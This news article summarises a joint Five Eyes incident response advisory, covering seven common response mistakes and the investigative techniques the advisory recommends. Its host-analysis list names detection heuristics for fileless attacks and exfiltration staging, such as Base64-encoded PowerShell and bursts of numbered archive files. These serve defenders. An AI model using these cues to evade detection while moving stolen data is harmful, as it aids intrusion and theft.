Britain and the other ‘Five Eyes’ nations have joined forces to issue a rare joint technical guidance update designed to enhance incident response — warning that common knee-jerk actions by systems owners often muddy the waters for investigators and tip off threat actors that the victim is aware of the compromise.
The joint cyber security advisory has been published by the UK’s National Cyber Security Centre in conjunction with its counterparts in the other Five Eyes countries; the US, Canada, Australia and New Zealand. The NCSC notes that it “highlights technical approaches for organisations – including those which protect our most critical assets – that will help to uncover malicious activity” as well as mitigate.
As Chris Krebs, director of the US Cybersecurity and Infrastructure Security Agency (CISA), puts it: “[This] joint alert is the first of its kind for CISA since our formal establishment in 2018 and one I’ve aimed for since day one. This unified approach to combining our experiences with a range of malicious actors means that we’re able to extend our defensive umbrella on a global scale.”
Here are the seven actions to consider/consider avoiding.
1: Don’t Mitigate too Fast
Slow and steady can win the race when it comes to tackling intruders in your system. Rushing to take action can cause the loss of volatile data such as memory and other host-based artifacts, the update says. It can also alert the threat actor and cause them to change their tactics or techniques accordingly. You’ve noticed an intrusion? Stay cool, and consider soliciting incident response support from a third-party.
2: Look, Don’t Touch
While it may be tempting to ping your adversary, or use nslookup to dig up more details, these actions can tip off the hacker that they have been detected.
3: Pre-Emptive C&C Blocking is Best Avoided
A kneejerk reaction to block any Command and Control (C&C) infrastructure spotted is understandable. But as the advisory explains: “Network infrastructure is fairly inexpensive. An adversary can easily change to new command and control infrastructure, and you will lose visibility of their activity.”
Content from our partners
4: Let them Keep Your Creds, for a Bit…
Preemptive credential resets are, the advisory notes — perhaps surprisingly for some — counterproductive: “The adversary is likely to have multiple credentials or access to your entire Active Directory. In this case the attacker will probably use other credentials, create new credentials, or forge tickets.”
5: Log data (Say You Have It…)
Failure to preserve or collect log data that could be critical to identifying access to the compromised systems: If critical log types are not collected, or are not retained for a sufficient length of time, key information about the incident may not be determinable. The Five Eyes update suggests you retain log data for at least one year.
6: Communicating Over the Incident Response Network?
Don’t do that… Keep comms “out of band”.
7: Avoid Whack-a-Mole
“Playing “whack-a-mole” by blocking an IP address—without taking steps to determine what the binary is and how it got there—leaves the adversary an opportunity to change tactics and retain access to the network,” the update warns.
Not recommended: playing Whac-a-Mole with your attacker
Technical Steps You Should Take
The advisory also identifies four technical approaches which should be at the forefront of any response to a breach, as well as recommending information to review for host analysis, including:
- Identifying any process that is not signed and is connecting to the internet looking for beaconing or significant data transfers.
- Collecting all PowerShell command line requests looking for Base64-encoded commands to help identify malicious fileless attacks.
- Looking for excessive
.RAR,7zip, orWinZipprocesses, especially with suspicious file names, to help discover exfiltration staging (suspicious file names include naming conventions such as,1.zip,2.zip, etc.).
The advisory adds that teams should take the following actions:
Indicators of Compromise Search: Collect known bad indicators of compromise from a broad variety of sources, and search for those indicators in network and host artifacts. By assessing the results of this search you can look for further indications of malicious activity to eliminate false positives.
Frequency Analysis: This can be used to calculate normal traffic patterns in both network and host systems and identify activity that is inconsistent with normal patterns. “Variables often considered include timing, source location, destination location, port utilization, protocol adherence, file location, integrity via hash, file size, naming convention, and other attributes,” the advisory explains.
Pattern Analysis: Analyzing data to identify repeating patterns that are indicative of either automated mechanisms, such as malware or scripts, or routine human threat actor activity can be another useful approach.
Anomaly Detection: Conduct an analyst review (based on the team’s knowledge of, and experience with, system administration) of collected artifacts to identify errors. Review unique values for various datasets and research associated data, where appropriate, to find anomalous activity that could be indicative of threat actor activity.
Incident Response: Find Out More
The full security advisory is available on the CISA website here, and can be downloaded as a PDF here.
